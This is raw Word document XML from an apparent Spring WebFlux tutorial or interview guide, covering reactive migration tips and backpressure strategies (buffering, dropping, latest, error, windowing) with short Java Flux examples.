          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid mixing blocking and non-blocking code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F283EB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Use Mono and Flux Properly:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Choose Mono for single responses and Flux for multiple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FACBF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Error Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use onErrorResume or onErrorContinue to manage failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516ED81B"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Graceful Shutdown:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Disposable to manage cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246571CE"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Metrics and Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrate with Micrometer and Prometheus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CBB830"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6AF78">
          <v:rect id="_x0000_i2822" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65E6CC"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Example: Handling Backpressure in WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C540663"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GetMapping("/stream")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E85DB7C"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public Flux&lt;Integer&gt; streamNumbers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6041DD84"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return Flux.range(1, 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DBF70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delayElements(Duration.ofMillis(50))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669FCA56"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               .onBackpressureDrop();  // Drop if consumer is too slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B223171"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CF7A9F" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="00000000" w:rsidP="009546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662E4">
          <v:rect id="_x0000_i2823" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="779FCC92" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487800B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place MVC dependencies with WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBF3F52"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Refactor synchronous methods to use Mono/Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ED0F65"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Use WebClient instead of RestTemplate for external calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26747108"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Leverage reactive repositories (ReactiveCrudRepository).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C21037D"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Test with WebTestClient instead of MockMvc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FCC77"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Monitor performance using metrics and non-blocking profiling tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3ED50" w14:textId="77777777" w:rsidR="009546B7" w:rsidRPr="009546B7" w:rsidRDefault="009546B7" w:rsidP="009546B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By making these changes, your application will become more </w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="009546B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, capable of handling a high volume of concurrent requests with minimal resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B75C29"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8F6AF">
          <v:rect id="_x0000_i2824" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D578F86" w14:textId="54AAA7F9" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="006D4D99" w:rsidP="00187C12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="692" w:name="_Toc197867906"/>
      <w:r w:rsidRPr="006D4D99">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How do you manage back pressure in dealing with Spring Reactive where consumer is slower than a producer</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="692"/>
    </w:p>
    <w:p w14:paraId="4E3B8571" w14:textId="1305E279" w:rsidR="00B8030B" w:rsidRPr="00B8030B" w:rsidRDefault="00B8030B" w:rsidP="0089726C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Managing </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Reactive application is crucial when the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is slower than the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Backpressure mechanisms ensure that the system remains stable and responsive by controlling the flow of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B122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60978">
          <v:rect id="_x0000_i2825" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7874FED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1. What is Backpressure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B609A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Backpressure occurs when a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fast producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends data faster than a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slow consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can process. Without backpressure handling, this can lead to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0406985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Memory Overflow:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unprocessed data piles up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0E469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pplication Crashes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Due to resource exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB645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Performance Degradation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Slow processing leads to timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D952002"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62AEB">
          <v:rect id="_x0000_i2826" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF9C4C5"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2. How to Manage Backpressure in Spring WebFlux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FE7D7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pring WebFlux, built on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Project Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, provides several strategies to handle backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421F945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Buffering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Temporarily store data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508ADF9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Dropping:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discard excess data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF913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Latest:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep only the latest item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62FF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Error:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Signal an error when the buffer is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF038D9"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9498C">
          <v:rect id="_x0000_i2827" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1BFE3"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3. Strategies for Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EB464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a. Buffering (Default Behavior)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F2D67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uffers incoming data when the consumer is slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641AB5E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buffer")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC11F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bufferStream() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE287B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     // Produces 1000 items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337DF2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  // Simulate slow production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE32E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78B4999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50);  // Buffer up to 50 items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437635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8E92D96"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1486AB5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revents data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D66CB0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for short bursts of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B883A9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743B90C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Memory overflow if the buffer is too large.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E4D22"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1740FA">
          <v:rect id="_x0000_i2828" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751CA3A"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b. Dropping (Ignore Overflow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C7C16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rops excess elements if the buffer is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552637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drop")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BE425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dropStream() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203DE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2975AE9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22B86BF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1811CB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item -&gt; System.out.println("Dropped: " + item));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAB5F6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277A9C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33B98D3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revents memory overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706B40D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when data loss is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA4158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7AD9F1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ata may be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16040463"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246460">
          <v:rect id="_x0000_i2829" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3329007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 Latest (Keep Only the Most Recent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4702A48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Keeps only the latest element when the buffer is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F833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latest")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1009FEE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latestStream() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8555B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    return Flux.range(1, 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183606E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6BB29E7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3E75DB9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Latest();  // Only the most recent element is retained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A76686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B901FDE"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2323696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Latest data is always available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20907C6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uitable for monitoring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6200396D"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3DA8008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Intermediate data may be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71295DD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BA180">
          <v:rect id="_x0000_i2830" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B02B5C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d. Error (Fail Fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205ADD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hrows an error when the buffer overflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA59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error")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F78B29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errorStream() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5468D12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542DA8B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76ADD6C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06169FB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Error();  // Emit error on overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFAD5B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DE5FFA9"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Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DCD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Immediate feedback if overwhelmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A24235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ful when data integrity is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176CEF44"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Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923C6B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Application crash if not handled properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A369C"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DF7142">
          <v:rect id="_x0000_i2831" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5DF55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4. Example: Combining Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789A997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You can combine strategies for more controlled backpressure management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE82A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combined")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E66C6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combinedStream() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD86B7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629F0D0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0AC438E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24C81B4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10)    // Buffer 10 items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB94C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item -&gt; System.out.println("Dropped: " + item)); // Drop excess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C17D7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79C5A6C6"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8CEEF">
          <v:rect id="_x0000_i2832" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9BFE08"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5. Reactive Streams Backpressure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6"/>
        <w:gridCol w:w="4041"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8030B" w:rsidRPr="00B8030B" w14:paraId="767062B2" w14:textId="77777777" w:rsidTr="00B8030B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="316D3560"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Operator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45A56DC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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8030B" w:rsidRPr="00B8030B" w14:paraId="48916081" w14:textId="77777777" w:rsidTr="00B8030B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="508741D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Buffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FF5ECF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uffers items when the downstream is slow.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8030B" w:rsidRPr="00B8030B" w14:paraId="3550E994" w14:textId="77777777" w:rsidTr="00B8030B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C301081"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Drop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF5DDF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Drops items when overwhelmed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8030B" w:rsidRPr="00B8030B" w14:paraId="6C940779" w14:textId="77777777" w:rsidTr="00B8030B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1DA9F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Latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="190EEC8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Keeps only the most recent item.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8030B" w:rsidRPr="00B8030B" w14:paraId="59477EB8" w14:textId="77777777" w:rsidTr="00B8030B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05EF9B6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onBackpressureError</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54298E5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hrows an exception when overwhelmed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26D53921"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79E7D">
          <v:rect id="_x0000_i2833" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD6A1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6. Flow Control with Window and Batching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DD1DE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Windowing (Chunking the Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCFE275"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plits a large stream into manageable windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F724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window")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1640EA70"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List&lt;Integer&gt;&gt; windowStream() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E84E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51ED974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window(50)  // Each window contains 50 items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D1D80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flatMap(window -&gt; window.collectList())</w:t>
      </w:r>
    </w:p>
